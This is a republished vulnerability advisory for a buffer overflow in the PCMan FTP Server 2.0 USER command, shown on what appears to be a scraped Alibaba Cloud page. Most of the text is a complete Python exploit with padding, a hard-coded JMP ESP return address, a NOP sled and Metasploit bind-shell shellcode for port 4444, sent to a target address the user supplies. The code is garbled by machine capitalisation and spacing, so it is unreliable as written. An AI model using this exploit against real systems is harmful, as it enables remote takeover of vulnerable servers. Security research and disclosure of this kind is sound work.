PCMan FTP Server 'USER' command Buffer Overflow Vulnerability

Source: Internet
Author: User
Tags signal handler

Release date:
Updated on: 2013-07-02

Affected Systems:
PCMan FTP Server 2.0
Description:
--------------------------------------------------------------------------------
Bugtraq id: 60837
 
The PCMan FTP Server is an FTP Server software.
 
The implementation of PCMan FTP Server 2.0 has a security vulnerability that allows remote attackers to execute arbitrary code in the context of the affected application.
 
<* Source: Jacob Holcomb

Link: http://packetstormsecurity.com/files/122173/PCMans-FTP-Server-2.0-Directory-Traversal.html
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
#! /Usr/bin/env python
 
Import signal
From time import sleep
From socket import *
From sys import exit, exc_info
 
Def sigHandle (signum, frm): # Signal handler

Print "\ n [!] Cleaning up the exploit... [!] \ N"
Sleep (1)
Exit (0)
 

Def targServer ():

While True:
Try:
Server = inet_aton (raw_input ("\ n [*] Please enter the IPv4
Address of the PCMan FTP Server: \ n> "))
Server = inet_ntoa (server)
Break
Except t:
Print "\ n [!] Error: Please enter a valid IPv4 address.
[!] \ N"
Sleep (1)
Continue

Return server


Def main ():

Print ("" \ n [*] Title ************************** PCMan FTP Server
V2.0.7 Remote Root Shell Exploit-USER Command
[*] Discovered and Reported ***** June 2013
[*] Discovered/Exploited By ****** Jacob Holcomb/Gimppy, Security Analyst
@ Independent Security Evaluators
[*] Exploit/Advisory ************** http://infosec42.blogspot.com/
[*] Software ********************** PCMan FTP Server v2.0.7 (Listens on
TCP/21)
[*] Tested Commands *************** USER (Other commands were not tested
And may be vulnerable)
[*] CVE ************************** PCMan FTP Server v2.0.7 Buffer
Overflow: Pending """)
Signal. signal (signal. SIGINT, sigHandle) # Setting signal handler
Ctrl + c
Victim = targServer ()
Port = int (21)
Cmd = "USER" # Vulnerable command
JuNk = "\ x42" * 2004
# KERNEL32.dll 7CA58265-JMP ESP
Ret = "\ x65 \ x82 \ xA5 \ x7C"
NOP = "\ x90" * 50
 
#348 Bytes Bind Shell Port TCP/4444
# Msfpayload windows/shell_bind_tcp EXITFUNC = thread LPORT = 4444 R |
# Msfencode-e x86/shikata_ga_nai-c 1-B "\ x0d \ x0a \ x00 \ xf1" R
Shellcode =
"\ Xdb \ xcc \ xba \ x40 \ xb6 \ x7d \ xba \ xd9 \ x74 \ x24 \ xf4 \ x58 \ x29 \ xc9"
Shellcode + =
"\ Xb1 \ x50 \ x31 \ x50 \ x18 \ x03 \ x50 \ x18 \ x83 \ xe8 \ xbc \ x54 \ x88 \ x46"
Shellcode + =
"\ X56 \ x72 \ x3e \ x5f \ x5f \ x7b \ x3e \ x60 \ xff \ x0f \ xad \ xbb \ xdb \ x84"
Shellcode + =
"\ X6b \ xf8 \ xa8 \ xe7 \ x76 \ x78 \ xaf \ xf8 \ xf2 \ x37 \ xb7 \ x8d \ x5a \ xe8"
Shellcode + =
"\ Xc6 \ x7a \ x2d \ x63 \ xfc \ xf7 \ xaf \ x9d \ xcd \ xc7 \ x29 \ xcd \ xa9 \ x08"
Shellcode + =
"\ X3d \ x09 \ x42 \ xb3 \ x14 \ xb0 \ xb8 \ x38 \ x2d \ x60 \ x1b \ xe9 \ x27"
Shellcode + =
"\ X6d \ xe8 \ xb6 \ xe3 \ x6c \ x04 \ x2e \ x67 \ x62 \ x91 \ x24 \ x28 \ x66 \ x24"
Shellcode + =
"\ Xd0 \ xd4 \ xba \ xad \ xaf \ xb7 \ xe6 \ xad \ xce \ x84 \ xd7 \ x16 \ x74 \ x80"
Shellcode + =
"\ X54 \ x99 \ xfe \ xd6 \ x56 \ x52 \ xcb \ xef \ x31 \ xfb \ x4d \ x98"
Shellcode + =
"\ X3f \ xb5 \ x7f \ xb4 \ x10 \ xb5 \ xa9 \ x22 \ xc2 \ x2f \ x3d \ x98 \ xd6 \ xc7"
Shellcode + =
"\ Xca \ xad \ x24 \ x47 \ x60 \ xad \ x99 \ x1f \ x43 \ xbc \ xe6 \ xdb \ x03 \ xc0"
Shellcode + =
"\ Xc1 \ x43 \ x2a \ xdb \ x88 \ xfa \ xc1 \ x2c \ x57 \ xa8 \ x73 \ x2f \ xa8 \ x82"
Shellcode + =
"\ Xeb \ xf6 \ x5f \ xd6 \ x46 \ x5f \ x9f \ xce \ xcb \ x33 \ x0c \ xbc \ xb8 \ xf0"
Shellcode + =
"\ Xe1 \ x01 \ x6d \ x08 \ xd5 \ xe0 \ xf9 \ xe7 \ x8a \ x8a \ xaa \ x8e \ xd2 \ xc6"
Shellcode + =
"\ X24 \ x35 \ x0e \ x99 \ x73 \ x62 \ xd0 \ x8f \ x11 \ x9d \ x7f \ x65 \ x1a \ x4d"
Shellcode + =
"\ X17 \ x21 \ x49 \ x40 \ x01 \ x7e \ x6e \ x4b \ x82 \ xd4 \ x6f \ xa4 \ x4d \ x32"
Shellcode + =
"\ Xc6 \ xc3 \ xc7 \ xeb \ x27 \ x1d \ x87 \ x47 \ x83 \ xf7 \ xd7 \ xb8 \ xb8 \ x90"
Shellcode + =
"\ Xc0 \ x40 \ x78 \ x19 \ x58 \ x4c \ x52 \ x8f \ x99 \ x62 \ x3c \ x5a \ x02 \ xe5"
Shellcode + =
"\ Xa8 \ xf9 \ xa7 \ x60 \ xcd \ x94 \ x67 \ x2a \ x24 \ xa5 \ x01 \ x2b \ x5c \ x71"
Shellcode + =
"\ X9b \ x56 \ x91 \ xb9 \ x68 \ x3c \ x2f \ x7b \ xa2 \ xbf \ x8d \ x50 \ x2f \ xb2"
Shellcode + =
"\ X6b \ x91 \ xe4 \ x66 \ x20 \ x89 \ x88 \ x86 \ x85 \ x5c \ x92 \ x02 \ xad \ x9f"
Shellcode + =
"\ Xba \ xb6 \ x7a \ x32 \ x12 \ x18 \ xd5 \ xd8 \ x95 \ xcb \ x84 \ x49 \ xc7 \ x14"
Shellcode + =
"\ Xf6 \ x1a \ x4a \ x33 \ xf3 \ x14 \ xc7 \ x3b \ x2d \ xc2 \ x17 \ x3c \ xe6 \ xec"
Shellcode + =
"\ X38 \ x48 \ x5f \ xef \ x3a \ x8b \ x3b \ xf0 \ xeb \ x46 \ x3c \ xde \ x7c \ x88"
Shellcode + = "\ x0c \ x3f \ x1c \ x05 \ x6f \ x16 \ x22 \ x79"
 
Sploit = Cmd + JuNk + ret + NOP + shellcode
Sploit + = "\ x42" * (2992-len (NOP + shellcode) + "\ r \ n"
 
Try:
Print "\ n [*] Creating network socket ."
Net_sock = socket (AF_INET, SOCK_STREAM)
Except t:
Print "\ n [!] There was an error creating the network socket.
[!] \ N % s \ n "% exc_info ()
Sleep (1)
Exit (0)
 
Try:
Print "[*] Connecting to PCMan FTP Server @ % s on port TCP/% d ."
% (Victim, port)
Net_sock.connect (victim, port ))
Except t:
Print "\ n [!] There was an error connecting to % s.
[!] \ N % s \ n "% (victim, exc_info ())
Sleep (1)
Exit (0)

Try:
Print "[*] Attempting to exploit the ftp user command.
[*] Sending 1337 ro0t Sh3ll exploit to % s on TCP port % d.
[*] Payload Length: % d bytes. "" % (victim, port, len (sploit ))
Net_sock.send (sploit)
Sleep (1)
Except t:
Print "\ n [!] There was an error sending the 1337 ro0t Sh3ll
Exploit to % s [!] \ N % s \ n "% (victim, exc_info ())
Sleep (1)
Exit (0)
 
Try:
Print "[*] 1337 ro0t Sh3ll exploit was sent! Fingers crossed
For code execution!
[*] Closing network socket. Press ctrl + c repeatedly to force exploit
Cleanup. \ n """
Net_sock.close ()
Except t:
Print "\ n [!] There was an error closing the network socket.
[!] \ N % s \ n "% exc_info ()
Sleep (1)
Exit (0)
 

If _ name _ = "_ main __":
Main ()

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
 
PCMan
-----
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
 
Https://files.secureserver.net/1sMltFOsytirTG

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.